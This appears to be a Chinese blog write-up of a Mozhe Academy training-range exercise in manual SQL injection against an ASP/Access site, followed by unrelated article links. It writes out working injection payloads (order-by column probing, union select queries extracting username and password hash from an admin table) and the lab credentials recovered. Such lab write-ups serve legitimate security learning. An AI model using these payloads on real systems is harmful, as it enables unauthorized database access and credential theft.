当前位置: 首页 > article >正文

SQL手工注入漏洞测试(Access数据库)-墨者


———靶场专栏———


声明:文章由作者weoptions学习或练习过程中的步骤及思路,非正式答案,仅供学习和参考。

靶场背景:

来源:

        墨者学院

简介:

        安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Access的数据结构;
4.了解字符串的MD5加解密;

解题方向:

        手工进行SQL注入测试,获取管理密码登录。


解题思路:

        先按mysql思路来整吧,先猜列,然后查库,然后找数据。


解题步骤:

        

        一、猜列

new_list.asp?id=1 order by 4

order by 5的时候显示不正常,order by 4的时候显示正常。说明有四个字段。


        二、测试显位

new_list.asp?id=-2 union select 1,2,3,4

昂?啥也不显示,让盲注吗?找找资料先。哦哦哦,得先猜表名。

由于Access数据库特性招致sql注入是需要借助字典去猜解表明和列名。

如果猜解不到,可以自定义社工字典或者采用偏移注入。

/new_list.asp?id=-2 union select 1,2,3,4 from admin

显位在二和三。

直接猜名字和密码吧


new_list.asp?id=-2 union select 1,username,passwd,4 from admin

moke,7e6ec4fadf84938f(MD5解密后为27737201)

登陆后拿到KEY: mozhe8e380717a06636d76e5babba688


总结:

        难度:★★★★☆☆☆☆☆☆

        解析:难度不大,记录一下



http://www.kler.cn/a/160317.html

相关文章:

  • ios swift开发--ios远程推送通知配置
  • 前端开发中常用的包管理器(npm、yarn、pnpm、bower、parcel)
  • 普通电脑上安装属于自己的Llama 3 大模型和对话客户端
  • 使用kalibr_calibration标定相机(realsense)和imu(h7min)
  • 2024开发者浏览器必备扩展,不允许还有人不知道~
  • MySQL数据库:SQL语言入门 【上】(学习笔记)
  • 【Openstack Train】十六、swift安装
  • vue 学习 -- day39(reactive 对比 ref)
  • 基于深度学习yolov5行人社交安全距离监测系统
  • 探索鸿蒙_ArkTs开发语言
  • 亚马逊云科技Serverless视频内容摘要提取方案
  • 如何调用 API | 学习笔记
  • 动手学习深度学习-跟李沐学AI-自学笔记(3)
  • arcgis导出某个属性的栅格
  • 【开源】基于Vue.js的房屋出售出租系统
  • 华为数通---使用基本ACL限制Telnet登录权限案例
  • 宝塔是可以切换mongodb版本的
  • Django之缓存
  • Java 将word转为PDF的三种方式和处理在服务器上下载后乱码的格式
  • MySQL联合查询、最左匹配、范围查询导致失效
  • 【EI会议征稿中】第三届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2024)
  • 云服务器与nas实现在冷热资源访问,nginx代理
  • 如何设置不同的网页标题(react)
  • 配置CentOS服务器以支持PHP
  • Python-算术运算符详解
  • 参数是Id,但要显示接口中的id对应的名称